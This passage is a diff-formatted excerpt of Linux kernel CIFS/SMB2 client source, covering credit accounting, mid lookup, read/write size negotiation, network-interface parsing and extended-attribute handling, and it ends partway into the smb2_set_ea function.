++		trace_smb3_reconnect_detected(server->CurrentMid,
++			server->conn_id, server->hostname, scredits, add, in_flight);
++
++		cifs_dbg(FYI, "trying to put %d credits from the old server instance %d\n",
++			 add, instance);
++	}
++
++	if (reconnect_with_invalid_credits) {
++		trace_smb3_reconnect_with_invalid_credits(server->CurrentMid,
++			server->conn_id, server->hostname, scredits, add, in_flight);
++		cifs_dbg(FYI, "Negotiate operation when server credits is non-zero. Optype: %d, server credits: %d, credits added: %d\n",
++			 optype, scredits, add);
++	}
++
++	spin_lock(&server->srv_lock);
++	if (server->tcpStatus == CifsNeedReconnect ||
++	    server->tcpStatus == CifsExiting) {
++		spin_unlock(&server->srv_lock);
++		return;
++	}
++	spin_unlock(&server->srv_lock);
++
++	switch (rc) {
++	case -1:
++		/* change_conf hasn't been executed */
++		break;
++	case 0:
++		cifs_server_dbg(VFS, "Possible client or server bug - zero credits\n");
++		break;
++	case 1:
++		cifs_server_dbg(VFS, "disabling echoes and oplocks\n");
++		break;
++	case 2:
++		cifs_dbg(FYI, "disabling oplocks\n");
++		break;
++	default:
++		/* change_conf rebalanced credits for different types */
++		break;
++	}
++
++	trace_smb3_add_credits(server->CurrentMid,
++			server->conn_id, server->hostname, scredits, add, in_flight);
++	cifs_dbg(FYI, "%s: added %u credits total=%d\n", __func__, add, scredits);
++}
++
++static void
++smb2_set_credits(struct TCP_Server_Info *server, const int val)
++{
++	int scredits, in_flight;
++
++	spin_lock(&server->req_lock);
++	server->credits = val;
++	if (val == 1)
++		server->reconnect_instance++;
++	scredits = server->credits;
++	in_flight = server->in_flight;
++	spin_unlock(&server->req_lock);
++
++	trace_smb3_set_credits(server->CurrentMid,
++			server->conn_id, server->hostname, scredits, val, in_flight);
++	cifs_dbg(FYI, "%s: set %u credits\n", __func__, val);
++
++	/* don't log while holding the lock */
++	if (val == 1)
++		cifs_dbg(FYI, "set credits to 1 due to smb2 reconnect\n");
++}
++
++static int *
++smb2_get_credits_field(struct TCP_Server_Info *server, const int optype)
++{
++	switch (optype) {
++	case CIFS_ECHO_OP:
++		return &server->echo_credits;
++	case CIFS_OBREAK_OP:
++		return &server->oplock_credits;
++	default:
++		return &server->credits;
++	}
++}
++
++static unsigned int
++smb2_get_credits(struct mid_q_entry *mid)
++{
++	return mid->credits_received;
++}
++
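++/*
++ * Reserve credits for a multi-credit (large MTU) request. Waits until at
++ * least one credit is available, keeps 8 credits back for reopen and other
++ * ops, and charges one credit per SMB2_MAX_BUFFER_SIZE chunk of the I/O.
++ */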
++static int
++smb2_wait_mtu_credits(struct TCP_Server_Info *server, unsigned int size,
++		      unsigned int *num, struct cifs_credits *credits)
++{
++	int rc = 0;
++	unsigned int scredits, in_flight;
++
++	spin_lock(&server->req_lock);
++	while (1) {
++		if (server->credits <= 0) {
++			spin_unlock(&server->req_lock);
++			cifs_num_waiters_inc(server);
++			rc = wait_event_killable(server->request_q,
++				has_credits(server, &server->credits, 1));
++			cifs_num_waiters_dec(server);
++			if (rc)
++				return rc;
++			spin_lock(&server->req_lock);
++		} else {
++			spin_unlock(&server->req_lock);
++			spin_lock(&server->srv_lock);
++			if (server->tcpStatus == CifsExiting) {
++				spin_unlock(&server->srv_lock);
++				return -ENOENT;
++			}
++			spin_unlock(&server->srv_lock);
++
++			spin_lock(&server->req_lock);
++			scredits = server->credits;
++			/* can deadlock with reopen */
++			if (scredits <= 8) {
++				*num = SMB2_MAX_BUFFER_SIZE;
++				credits->value = 0;
++				credits->instance = 0;
++				break;
++			}
++
++			/* leave some credits for reopen and other ops */
++			scredits -= 8;
++			*num = min_t(unsigned int, size,
++				     scredits * SMB2_MAX_BUFFER_SIZE);
++
++			credits->value =
++				DIV_ROUND_UP(*num, SMB2_MAX_BUFFER_SIZE);
++			credits->instance = server->reconnect_instance;
++			server->credits -= credits->value;
++			server->in_flight++;
++			if (server->in_flight > server->max_in_flight)
++				server->max_in_flight = server->in_flight;
++			break;
++		}
++	}
++	scredits = server->credits;
++	in_flight = server->in_flight;
++	spin_unlock(&server->req_lock);
++
++	trace_smb3_wait_credits(server->CurrentMid,
++			server->conn_id, server->hostname, scredits, -(credits->value), in_flight);
++	cifs_dbg(FYI, "%s: removed %u credits total=%d\n",
++			__func__, credits->value, scredits);
++
++	return rc;
++}
++
++static int
++smb2_adjust_credits(struct TCP_Server_Info *server,
++		    struct cifs_credits *credits,
++		    const unsigned int payload_size)
++{
++	int new_val = DIV_ROUND_UP(payload_size, SMB2_MAX_BUFFER_SIZE);
++	int scredits, in_flight;
++
++	if (!credits->value || credits->value == new_val)
++		return 0;
++
++	if (credits->value < new_val) {
++		trace_smb3_too_many_credits(server->CurrentMid,
++				server->conn_id, server->hostname, 0, credits->value - new_val, 0);
++		cifs_server_dbg(VFS, "request has less credits (%d) than required (%d)",
++				credits->value, new_val);
++
++		return -ENOTSUPP;
++	}
++
++	spin_lock(&server->req_lock);
++
++	if (server->reconnect_instance != credits->instance) {
++		scredits = server->credits;
++		in_flight = server->in_flight;
++		spin_unlock(&server->req_lock);
++
++		trace_smb3_reconnect_detected(server->CurrentMid,
++			server->conn_id, server->hostname, scredits,
++			credits->value - new_val, in_flight);
++		cifs_server_dbg(VFS, "trying to return %d credits to old session\n",
++			 credits->value - new_val);
++		return -EAGAIN;
++	}
++
++	server->credits += credits->value - new_val;
++	scredits = server->credits;
++	in_flight = server->in_flight;
++	spin_unlock(&server->req_lock);
++	wake_up(&server->request_q);
++
++	trace_smb3_adj_credits(server->CurrentMid,
++			server->conn_id, server->hostname, scredits,
++			credits->value - new_val, in_flight);
++	cifs_dbg(FYI, "%s: adjust added %u credits total=%d\n",
++			__func__, credits->value - new_val, scredits);
++
++	credits->value = new_val;
++
++	return 0;
++}
++
++static __u64
++smb2_get_next_mid(struct TCP_Server_Info *server)
++{
++	__u64 mid;
++	/* for SMB2 we need the current value */
++	spin_lock(&server->mid_lock);
++	mid = server->CurrentMid++;
++	spin_unlock(&server->mid_lock);
++	return mid;
++}
++
++static void
++smb2_revert_current_mid(struct TCP_Server_Info *server, const unsigned int val)
++{
++	spin_lock(&server->mid_lock);
++	if (server->CurrentMid >= val)
++		server->CurrentMid -= val;
++	spin_unlock(&server->mid_lock);
++}
++
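++/*
++ * Look up the pending mid that matches this reply (same MessageId and
++ * command, still in submitted state), taking a reference. When @dequeue
++ * is set the entry is also removed from the pending queue under the same
++ * lock, making find-and-remove atomic.
++ */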
++static struct mid_q_entry *
++__smb2_find_mid(struct TCP_Server_Info *server, char *buf, bool dequeue)
++{
++	struct mid_q_entry *mid;
++	struct smb2_hdr *shdr = (struct smb2_hdr *)buf;
++	__u64 wire_mid = le64_to_cpu(shdr->MessageId);
++
++	if (shdr->ProtocolId == SMB2_TRANSFORM_PROTO_NUM) {
++		cifs_server_dbg(VFS, "Encrypted frame parsing not supported yet\n");
++		return NULL;
++	}
++
++	spin_lock(&server->mid_lock);
++	list_for_each_entry(mid, &server->pending_mid_q, qhead) {
++		if ((mid->mid == wire_mid) &&
++		    (mid->mid_state == MID_REQUEST_SUBMITTED) &&
++		    (mid->command == shdr->Command)) {
++			kref_get(&mid->refcount);
++			if (dequeue) {
++				list_del_init(&mid->qhead);
++				mid->mid_flags |= MID_DELETED;
++			}
++			spin_unlock(&server->mid_lock);
++			return mid;
++		}
++	}
++	spin_unlock(&server->mid_lock);
++	return NULL;
++}
++
++static struct mid_q_entry *
++smb2_find_mid(struct TCP_Server_Info *server, char *buf)
++{
++	return __smb2_find_mid(server, buf, false);
++}
++
++static struct mid_q_entry *
++smb2_find_dequeue_mid(struct TCP_Server_Info *server, char *buf)
++{
++	return __smb2_find_mid(server, buf, true);
++}
++
++static void
++smb2_dump_detail(void *buf, struct TCP_Server_Info *server)
++{
++#ifdef CONFIG_CIFS_DEBUG2
++	struct smb2_hdr *shdr = (struct smb2_hdr *)buf;
++
++	cifs_server_dbg(VFS, "Cmd: %d Err: 0x%x Flags: 0x%x Mid: %llu Pid: %d\n",
++		 shdr->Command, shdr->Status, shdr->Flags, shdr->MessageId,
++		 shdr->Id.SyncId.ProcessId);
++	cifs_server_dbg(VFS, "smb buf %p len %u\n", buf,
++		 server->ops->calc_smb_size(buf));
++#endif
++}
++
++static bool
++smb2_need_neg(struct TCP_Server_Info *server)
++{
++	return server->max_read == 0;
++}
++
++static int
++smb2_negotiate(const unsigned int xid,
++	       struct cifs_ses *ses,
++	       struct TCP_Server_Info *server)
++{
++	int rc;
++
++	spin_lock(&server->mid_lock);
++	server->CurrentMid = 0;
++	spin_unlock(&server->mid_lock);
++	rc = SMB2_negotiate(xid, ses, server);
++	/* BB we probably don't need to retry with modern servers */
++	if (rc == -EAGAIN)
++		rc = -EHOSTDOWN;
++	return rc;
++}
++
++static unsigned int
++smb2_negotiate_wsize(struct cifs_tcon *tcon, struct smb3_fs_context *ctx)
++{
++	struct TCP_Server_Info *server = tcon->ses->server;
++	unsigned int wsize;
++
++	/* start with specified wsize, or default */
++	wsize = ctx->wsize ? ctx->wsize : CIFS_DEFAULT_IOSIZE;
++	wsize = min_t(unsigned int, wsize, server->max_write);
++	if (!(server->capabilities & SMB2_GLOBAL_CAP_LARGE_MTU))
++		wsize = min_t(unsigned int, wsize, SMB2_MAX_BUFFER_SIZE);
++
++	return wsize;
++}
++
++static unsigned int
++smb3_negotiate_wsize(struct cifs_tcon *tcon, struct smb3_fs_context *ctx)
++{
++	struct TCP_Server_Info *server = tcon->ses->server;
++	unsigned int wsize;
++
++	/* start with specified wsize, or default */
++	wsize = ctx->wsize ? ctx->wsize : SMB3_DEFAULT_IOSIZE;
++	wsize = min_t(unsigned int, wsize, server->max_write);
++#ifdef CONFIG_CIFS_SMB_DIRECT
++	if (server->rdma) {
++		if (server->sign)
++			/*
++			 * Account for SMB2 data transfer packet header and
++			 * possible encryption header
++			 */
++			wsize = min_t(unsigned int,
++				wsize,
++				server->smbd_conn->max_fragmented_send_size -
++					SMB2_READWRITE_PDU_HEADER_SIZE -
++					sizeof(struct smb2_transform_hdr));
++		else
++			wsize = min_t(unsigned int,
++				wsize, server->smbd_conn->max_readwrite_size);
++	}
++#endif
++	if (!(server->capabilities & SMB2_GLOBAL_CAP_LARGE_MTU))
++		wsize = min_t(unsigned int, wsize, SMB2_MAX_BUFFER_SIZE);
++
++	return wsize;
++}
++
++static unsigned int
++smb2_negotiate_rsize(struct cifs_tcon *tcon, struct smb3_fs_context *ctx)
++{
++	struct TCP_Server_Info *server = tcon->ses->server;
++	unsigned int rsize;
++
++	/* start with specified rsize, or default */
++	rsize = ctx->rsize ? ctx->rsize : CIFS_DEFAULT_IOSIZE;
++	rsize = min_t(unsigned int, rsize, server->max_read);
++
++	if (!(server->capabilities & SMB2_GLOBAL_CAP_LARGE_MTU))
++		rsize = min_t(unsigned int, rsize, SMB2_MAX_BUFFER_SIZE);
++
++	return rsize;
++}
++
++static unsigned int
++smb3_negotiate_rsize(struct cifs_tcon *tcon, struct smb3_fs_context *ctx)
++{
++	struct TCP_Server_Info *server = tcon->ses->server;
++	unsigned int rsize;
++
++	/* start with specified rsize, or default */
++	rsize = ctx->rsize ? ctx->rsize : SMB3_DEFAULT_IOSIZE;
++	rsize = min_t(unsigned int, rsize, server->max_read);
++#ifdef CONFIG_CIFS_SMB_DIRECT
++	if (server->rdma) {
++		if (server->sign)
++			/*
++			 * Account for SMB2 data transfer packet header and
++			 * possible encryption header
++			 */
++			rsize = min_t(unsigned int,
++				rsize,
++				server->smbd_conn->max_fragmented_recv_size -
++					SMB2_READWRITE_PDU_HEADER_SIZE -
++					sizeof(struct smb2_transform_hdr));
++		else
++			rsize = min_t(unsigned int,
++				rsize, server->smbd_conn->max_readwrite_size);
++	}
++#endif
++
++	if (!(server->capabilities & SMB2_GLOBAL_CAP_LARGE_MTU))
++		rsize = min_t(unsigned int, rsize, SMB2_MAX_BUFFER_SIZE);
++
++	return rsize;
++}
++
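++/*
++ * Parse the FSCTL_QUERY_NETWORK_INTERFACE_INFO response and rebuild the
++ * session's interface list, kept sorted by link speed. Existing entries
++ * are dropped (in-use ones survive via their own references) and the list
++ * is repopulated from the response.
++ */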
++static int
++parse_server_interfaces(struct network_interface_info_ioctl_rsp *buf,
++			size_t buf_len, struct cifs_ses *ses, bool in_mount)
++{
++	struct network_interface_info_ioctl_rsp *p;
++	struct sockaddr_in *addr4;
++	struct sockaddr_in6 *addr6;
++	struct iface_info_ipv4 *p4;
++	struct iface_info_ipv6 *p6;
++	struct cifs_server_iface *info = NULL, *iface = NULL, *niface = NULL;
++	struct cifs_server_iface tmp_iface;
++	ssize_t bytes_left;
++	size_t next = 0;
++	int nb_iface = 0;
++	int rc = 0, ret = 0;
++
++	bytes_left = buf_len;
++	p = buf;
++
++	spin_lock(&ses->iface_lock);
++	/* do not query too frequently, this time with lock held */
++	if (ses->iface_last_update &&
++	    time_before(jiffies, ses->iface_last_update +
++			(SMB_INTERFACE_POLL_INTERVAL * HZ))) {
++		spin_unlock(&ses->iface_lock);
++		return 0;
++	}
++
++	/*
++	 * Go through iface_list and do kref_put to remove
++	 * any unused ifaces. ifaces in use will be removed
++	 * when the last user calls a kref_put on it
++	 */
++	list_for_each_entry_safe(iface, niface, &ses->iface_list,
++				 iface_head) {
++		iface->is_active = 0;
++		kref_put(&iface->refcount, release_iface);
++		ses->iface_count--;
++	}
++	spin_unlock(&ses->iface_lock);
++
++	/*
++	 * Some servers (e.g. Samba) can return an empty interface list in
++	 * some cases, which is only a problem if we were requesting multichannel
++	 */
++	if (bytes_left == 0) {
++		/* avoid spamming logs every 10 minutes, so log only in mount */
++		if ((ses->chan_max > 1) && in_mount)
++			cifs_dbg(VFS,
++				 "multichannel not available\n"
++				 "Empty network interface list returned by server %s\n",
++				 ses->server->hostname);
++		rc = -EINVAL;
++		goto out;
++	}
++
++	while (bytes_left >= sizeof(*p)) {
++		memset(&tmp_iface, 0, sizeof(tmp_iface));
++		tmp_iface.speed = le64_to_cpu(p->LinkSpeed);
++		tmp_iface.rdma_capable = le32_to_cpu(p->Capability & RDMA_CAPABLE) ? 1 : 0;
++		tmp_iface.rss_capable = le32_to_cpu(p->Capability & RSS_CAPABLE) ? 1 : 0;
++
++		switch (p->Family) {
++		/*
++		 * The kernel and wire socket structures have the same
++		 * layout and use network byte order but make the
++		 * conversion explicit in case either one changes.
++		 */
++		case INTERNETWORK:
++			addr4 = (struct sockaddr_in *)&tmp_iface.sockaddr;
++			p4 = (struct iface_info_ipv4 *)p->Buffer;
++			addr4->sin_family = AF_INET;
++			memcpy(&addr4->sin_addr, &p4->IPv4Address, 4);
++
++			/* [MS-SMB2] 2.2.32.5.1.1 Clients MUST ignore these */
++			addr4->sin_port = cpu_to_be16(CIFS_PORT);
++
++			cifs_dbg(FYI, "%s: ipv4 %pI4\n", __func__,
++				 &addr4->sin_addr);
++			break;
++		case INTERNETWORKV6:
++			addr6 =	(struct sockaddr_in6 *)&tmp_iface.sockaddr;
++			p6 = (struct iface_info_ipv6 *)p->Buffer;
++			addr6->sin6_family = AF_INET6;
++			memcpy(&addr6->sin6_addr, &p6->IPv6Address, 16);
++
++			/* [MS-SMB2] 2.2.32.5.1.2 Clients MUST ignore these */
++			addr6->sin6_flowinfo = 0;
++			addr6->sin6_scope_id = 0;
++			addr6->sin6_port = cpu_to_be16(CIFS_PORT);
++
++			cifs_dbg(FYI, "%s: ipv6 %pI6\n", __func__,
++				 &addr6->sin6_addr);
++			break;
++		default:
++			cifs_dbg(VFS,
++				 "%s: skipping unsupported socket family\n",
++				 __func__);
++			goto next_iface;
++		}
++
++		/*
++		 * The iface_list is assumed to be sorted by speed.
++		 * Check if the new interface exists in that list.
++		 * NEVER change an existing iface entry, as it could be in use.
++		 * Add a new one instead.
++		 */
++		spin_lock(&ses->iface_lock);
++		iface = niface = NULL;
++		list_for_each_entry_safe(iface, niface, &ses->iface_list,
++					 iface_head) {
++			ret = iface_cmp(iface, &tmp_iface);
++			if (!ret) {
++				/* just get a ref so that it doesn't get picked/freed */
++				iface->is_active = 1;
++				kref_get(&iface->refcount);
++				ses->iface_count++;
++				spin_unlock(&ses->iface_lock);
++				goto next_iface;
++			} else if (ret < 0) {
++				/* all remaining ifaces are slower */
++				kref_get(&iface->refcount);
++				break;
++			}
++		}
++		spin_unlock(&ses->iface_lock);
++
++		/* no match. insert the entry in the list */
++		info = kmalloc(sizeof(struct cifs_server_iface),
++			       GFP_KERNEL);
++		if (!info) {
++			rc = -ENOMEM;
++			goto out;
++		}
++		memcpy(info, &tmp_iface, sizeof(tmp_iface));
++
++		/* add this new entry to the list */
++		kref_init(&info->refcount);
++		info->is_active = 1;
++
++		cifs_dbg(FYI, "%s: adding iface %zu\n", __func__, ses->iface_count);
++		cifs_dbg(FYI, "%s: speed %zu bps\n", __func__, info->speed);
++		cifs_dbg(FYI, "%s: capabilities 0x%08x\n", __func__,
++			 le32_to_cpu(p->Capability));
++
++		spin_lock(&ses->iface_lock);
++		if (!list_entry_is_head(iface, &ses->iface_list, iface_head)) {
++			list_add_tail(&info->iface_head, &iface->iface_head);
++			kref_put(&iface->refcount, release_iface);
++		} else
++			list_add_tail(&info->iface_head, &ses->iface_list);
++
++		ses->iface_count++;
++		spin_unlock(&ses->iface_lock);
++		ses->iface_last_update = jiffies;
++next_iface:
++		nb_iface++;
++		next = le32_to_cpu(p->Next);
++		if (!next) {
++			bytes_left -= sizeof(*p);
++			break;
++		}
++		p = (struct network_interface_info_ioctl_rsp *)((u8 *)p+next);
++		bytes_left -= next;
++	}
++
++	if (!nb_iface) {
++		cifs_dbg(VFS, "%s: malformed interface info\n", __func__);
++		rc = -EINVAL;
++		goto out;
++	}
++
++	/* Azure rounds the buffer size up by 8, to a 16-byte boundary */
++	if ((bytes_left > 8) || p->Next)
++		cifs_dbg(VFS, "%s: incomplete interface info\n", __func__);
++
++	if (!ses->iface_count) {
++		rc = -EINVAL;
++		goto out;
++	}
++
++out:
++	return rc;
++}
++
++int
++SMB3_request_interfaces(const unsigned int xid, struct cifs_tcon *tcon, bool in_mount)
++{
++	int rc;
++	unsigned int ret_data_len = 0;
++	struct network_interface_info_ioctl_rsp *out_buf = NULL;
++	struct cifs_ses *ses = tcon->ses;
++
++	/* do not query too frequently */
++	if (ses->iface_last_update &&
++	    time_before(jiffies, ses->iface_last_update +
++			(SMB_INTERFACE_POLL_INTERVAL * HZ)))
++		return 0;
++
++	rc = SMB2_ioctl(xid, tcon, NO_FILE_ID, NO_FILE_ID,
++			FSCTL_QUERY_NETWORK_INTERFACE_INFO,
++			NULL /* no data input */, 0 /* no data input */,
++			CIFSMaxBufSize, (char **)&out_buf, &ret_data_len);
++	if (rc == -EOPNOTSUPP) {
++		cifs_dbg(FYI,
++			 "server does not support query network interfaces\n");
++		ret_data_len = 0;
++	} else if (rc != 0) {
++		cifs_tcon_dbg(VFS, "error %d on ioctl to get interface list\n", rc);
++		goto out;
++	}
++
++	rc = parse_server_interfaces(out_buf, ret_data_len, ses, in_mount);
++	if (rc)
++		goto out;
++
++out:
++	kfree(out_buf);
++	return rc;
++}
++
++static void
++smb3_qfs_tcon(const unsigned int xid, struct cifs_tcon *tcon,
++	      struct cifs_sb_info *cifs_sb)
++{
++	int rc;
++	__le16 srch_path = 0; /* Null - open root of share */
++	u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
++	struct cifs_open_parms oparms;
++	struct cifs_fid fid;
++	struct cached_fid *cfid = NULL;
++
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.path = "",
++		.desired_access = FILE_READ_ATTRIBUTES,
++		.disposition = FILE_OPEN,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.fid = &fid,
++	};
++
++	rc = open_cached_dir(xid, tcon, "", cifs_sb, false, &cfid);
++	if (rc == 0)
++		memcpy(&fid, &cfid->fid, sizeof(struct cifs_fid));
++	else
++		rc = SMB2_open(xid, &oparms, &srch_path, &oplock, NULL, NULL,
++			       NULL, NULL);
++	if (rc)
++		return;
++
++	SMB3_request_interfaces(xid, tcon, true /* called during  mount */);
++
++	SMB2_QFS_attr(xid, tcon, fid.persistent_fid, fid.volatile_fid,
++			FS_ATTRIBUTE_INFORMATION);
++	SMB2_QFS_attr(xid, tcon, fid.persistent_fid, fid.volatile_fid,
++			FS_DEVICE_INFORMATION);
++	SMB2_QFS_attr(xid, tcon, fid.persistent_fid, fid.volatile_fid,
++			FS_VOLUME_INFORMATION);
++	SMB2_QFS_attr(xid, tcon, fid.persistent_fid, fid.volatile_fid,
++			FS_SECTOR_SIZE_INFORMATION); /* SMB3 specific */
++	if (cfid == NULL)
++		SMB2_close(xid, tcon, fid.persistent_fid, fid.volatile_fid);
++	else
++		close_cached_dir(cfid);
++}
++
++static void
++smb2_qfs_tcon(const unsigned int xid, struct cifs_tcon *tcon,
++	      struct cifs_sb_info *cifs_sb)
++{
++	int rc;
++	__le16 srch_path = 0; /* Null - open root of share */
++	u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
++	struct cifs_open_parms oparms;
++	struct cifs_fid fid;
++
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.path = "",
++		.desired_access = FILE_READ_ATTRIBUTES,
++		.disposition = FILE_OPEN,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.fid = &fid,
++	};
++
++	rc = SMB2_open(xid, &oparms, &srch_path, &oplock, NULL, NULL,
++		       NULL, NULL);
++	if (rc)
++		return;
++
++	SMB2_QFS_attr(xid, tcon, fid.persistent_fid, fid.volatile_fid,
++			FS_ATTRIBUTE_INFORMATION);
++	SMB2_QFS_attr(xid, tcon, fid.persistent_fid, fid.volatile_fid,
++			FS_DEVICE_INFORMATION);
++	SMB2_close(xid, tcon, fid.persistent_fid, fid.volatile_fid);
++}
++
++static int
++smb2_is_path_accessible(const unsigned int xid, struct cifs_tcon *tcon,
++			struct cifs_sb_info *cifs_sb, const char *full_path)
++{
++	__le16 *utf16_path;
++	__u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
++	int err_buftype = CIFS_NO_BUFFER;
++	struct cifs_open_parms oparms;
++	struct kvec err_iov = {};
++	struct cifs_fid fid;
++	struct cached_fid *cfid;
++	bool islink;
++	int rc, rc2;
++
++	rc = open_cached_dir(xid, tcon, full_path, cifs_sb, true, &cfid);
++	if (!rc) {
++		if (cfid->has_lease) {
++			close_cached_dir(cfid);
++			return 0;
++		}
++		close_cached_dir(cfid);
++	}
++
++	utf16_path = cifs_convert_path_to_utf16(full_path, cifs_sb);
++	if (!utf16_path)
++		return -ENOMEM;
++
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.path = full_path,
++		.desired_access = FILE_READ_ATTRIBUTES,
++		.disposition = FILE_OPEN,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.fid = &fid,
++	};
++
++	rc = SMB2_open(xid, &oparms, utf16_path, &oplock, NULL, NULL,
++		       &err_iov, &err_buftype);
++	if (rc) {
++		struct smb2_hdr *hdr = err_iov.iov_base;
++
++		if (unlikely(!hdr || err_buftype == CIFS_NO_BUFFER))
++			goto out;
++
++		if (rc != -EREMOTE && hdr->Status == STATUS_OBJECT_NAME_INVALID) {
++			rc2 = cifs_inval_name_dfs_link_error(xid, tcon, cifs_sb,
++							     full_path, &islink);
++			if (rc2) {
++				rc = rc2;
++				goto out;
++			}
++			if (islink)
++				rc = -EREMOTE;
++		}
++		if (rc == -EREMOTE && IS_ENABLED(CONFIG_CIFS_DFS_UPCALL) && cifs_sb &&
++		    (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_DFS))
++			rc = -EOPNOTSUPP;
++		goto out;
++	}
++
++	rc = SMB2_close(xid, tcon, fid.persistent_fid, fid.volatile_fid);
++
++out:
++	free_rsp_buf(err_buftype, err_iov.iov_base);
++	kfree(utf16_path);
++	return rc;
++}
++
++static int smb2_get_srv_inum(const unsigned int xid, struct cifs_tcon *tcon,
++			     struct cifs_sb_info *cifs_sb, const char *full_path,
++			     u64 *uniqueid, struct cifs_open_info_data *data)
++{
++	*uniqueid = le64_to_cpu(data->fi.IndexNumber);
++	return 0;
++}
++
++static int smb2_query_file_info(const unsigned int xid, struct cifs_tcon *tcon,
++				struct cifsFileInfo *cfile, struct cifs_open_info_data *data)
++{
++	struct cifs_fid *fid = &cfile->fid;
++
++	if (cfile->symlink_target) {
++		data->symlink_target = kstrdup(cfile->symlink_target, GFP_KERNEL);
++		if (!data->symlink_target)
++			return -ENOMEM;
++	}
++	return SMB2_query_info(xid, tcon, fid->persistent_fid, fid->volatile_fid, &data->fi);
++}
++
++#ifdef CONFIG_CIFS_XATTR
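++/*
++ * Copy SMB2 FILE_FULL_EA_INFORMATION entries into the Linux xattr format:
++ * either the value of one named EA, or (for listxattr) a list of names
++ * prefixed with "user." and NUL-terminated. Returns bytes used or -errno.
++ */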
++static ssize_t
++move_smb2_ea_to_cifs(char *dst, size_t dst_size,
++		     struct smb2_file_full_ea_info *src, size_t src_size,
++		     const unsigned char *ea_name)
++{
++	int rc = 0;
++	unsigned int ea_name_len = ea_name ? strlen(ea_name) : 0;
++	char *name, *value;
++	size_t buf_size = dst_size;
++	size_t name_len, value_len, user_name_len;
++
++	while (src_size > 0) {
++		name_len = (size_t)src->ea_name_length;
++		value_len = (size_t)le16_to_cpu(src->ea_value_length);
++
++		if (name_len == 0)
++			break;
++
++		if (src_size < 8 + name_len + 1 + value_len) {
++			cifs_dbg(FYI, "EA entry goes beyond length of list\n");
++			rc = -EIO;
++			goto out;
++		}
++
++		name = &src->ea_data[0];
++		value = &src->ea_data[src->ea_name_length + 1];
++
++		if (ea_name) {
++			if (ea_name_len == name_len &&
++			    memcmp(ea_name, name, name_len) == 0) {
++				rc = value_len;
++				if (dst_size == 0)
++					goto out;
++				if (dst_size < value_len) {
++					rc = -ERANGE;
++					goto out;
++				}
++				memcpy(dst, value, value_len);
++				goto out;
++			}
++		} else {
++			/* 'user.' plus a terminating null */
++			user_name_len = 5 + 1 + name_len;
++
++			if (buf_size == 0) {
++				/* skip copy - calc size only */
++				rc += user_name_len;
++			} else if (dst_size >= user_name_len) {
++				dst_size -= user_name_len;
++				memcpy(dst, "user.", 5);
++				dst += 5;
++				memcpy(dst, src->ea_data, name_len);
++				dst += name_len;
++				*dst = 0;
++				++dst;
++				rc += user_name_len;
++			} else {
++				/* stop before overrun buffer */
++				rc = -ERANGE;
++				break;
++			}
++		}
++
++		if (!src->next_entry_offset)
++			break;
++
++		if (src_size < le32_to_cpu(src->next_entry_offset)) {
++			/* stop before overrun buffer */
++			rc = -ERANGE;
++			break;
++		}
++		src_size -= le32_to_cpu(src->next_entry_offset);
++		src = (void *)((char *)src +
++			       le32_to_cpu(src->next_entry_offset));
++	}
++
++	/* didn't find the named attribute */
++	if (ea_name)
++		rc = -ENODATA;
++
++out:
++	return (ssize_t)rc;
++}
++
++static ssize_t
++smb2_query_eas(const unsigned int xid, struct cifs_tcon *tcon,
++	       const unsigned char *path, const unsigned char *ea_name,
++	       char *ea_data, size_t buf_size,
++	       struct cifs_sb_info *cifs_sb)
++{
++	int rc;
++	struct kvec rsp_iov = {NULL, 0};
++	int buftype = CIFS_NO_BUFFER;
++	struct smb2_query_info_rsp *rsp;
++	struct smb2_file_full_ea_info *info = NULL;
++
++	rc = smb2_query_info_compound(xid, tcon, path,
++				      FILE_READ_EA,
++				      FILE_FULL_EA_INFORMATION,
++				      SMB2_O_INFO_FILE,
++				      CIFSMaxBufSize -
++				      MAX_SMB2_CREATE_RESPONSE_SIZE -
++				      MAX_SMB2_CLOSE_RESPONSE_SIZE,
++				      &rsp_iov, &buftype, cifs_sb);
++	if (rc) {
++		/*
++		 * If ea_name is NULL (listxattr) and there are no EAs,
++		 * return 0 as it's not an error. Otherwise, the specified
++		 * ea_name was not found.
++		 */
++		if (!ea_name && rc == -ENODATA)
++			rc = 0;
++		goto qeas_exit;
++	}
++
++	rsp = (struct smb2_query_info_rsp *)rsp_iov.iov_base;
++	rc = smb2_validate_iov(le16_to_cpu(rsp->OutputBufferOffset),
++			       le32_to_cpu(rsp->OutputBufferLength),
++			       &rsp_iov,
++			       sizeof(struct smb2_file_full_ea_info));
++	if (rc)
++		goto qeas_exit;
++
++	info = (struct smb2_file_full_ea_info *)(
++			le16_to_cpu(rsp->OutputBufferOffset) + (char *)rsp);
++	rc = move_smb2_ea_to_cifs(ea_data, buf_size, info,
++			le32_to_cpu(rsp->OutputBufferLength), ea_name);
++
++ qeas_exit:
++	free_rsp_buf(buftype, rsp_iov.iov_base);
++	return rc;
++}
++
++
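++/*
++ * Set (or, with a NULL @ea_value, remove) an extended attribute by
++ * compounding SMB2_CREATE, SMB2_SET_INFO and SMB2_CLOSE into a single
++ * round trip.
++ */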
++static int
++smb2_set_ea(const unsigned int xid, struct cifs_tcon *tcon,
++	    const char *path, const char *ea_name, const void *ea_value,
++	    const __u16 ea_value_len, const struct nls_table *nls_codepage,
++	    struct cifs_sb_info *cifs_sb)
++{
++	struct cifs_ses *ses = tcon->ses;
++	struct TCP_Server_Info *server = cifs_pick_channel(ses);
++	__le16 *utf16_path = NULL;
++	int ea_name_len = strlen(ea_name);
++	int flags = CIFS_CP_CREATE_CLOSE_OP;
++	int len;
++	struct smb_rqst rqst[3];
++	int resp_buftype[3];
++	struct kvec rsp_iov[3];
++	struct kvec open_iov[SMB2_CREATE_IOV_SIZE];
++	struct cifs_open_parms oparms;
++	__u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
++	struct cifs_fid fid;
++	struct kvec si_iov[SMB2_SET_INFO_IOV_SIZE];
++	unsigned int size[1];
++	void *data[1];
++	struct smb2_file_full_ea_info *ea = NULL;
++	struct kvec close_iov[1];
++	struct smb2_query_info_rsp *rsp;
++	int rc, used_len = 0;
++
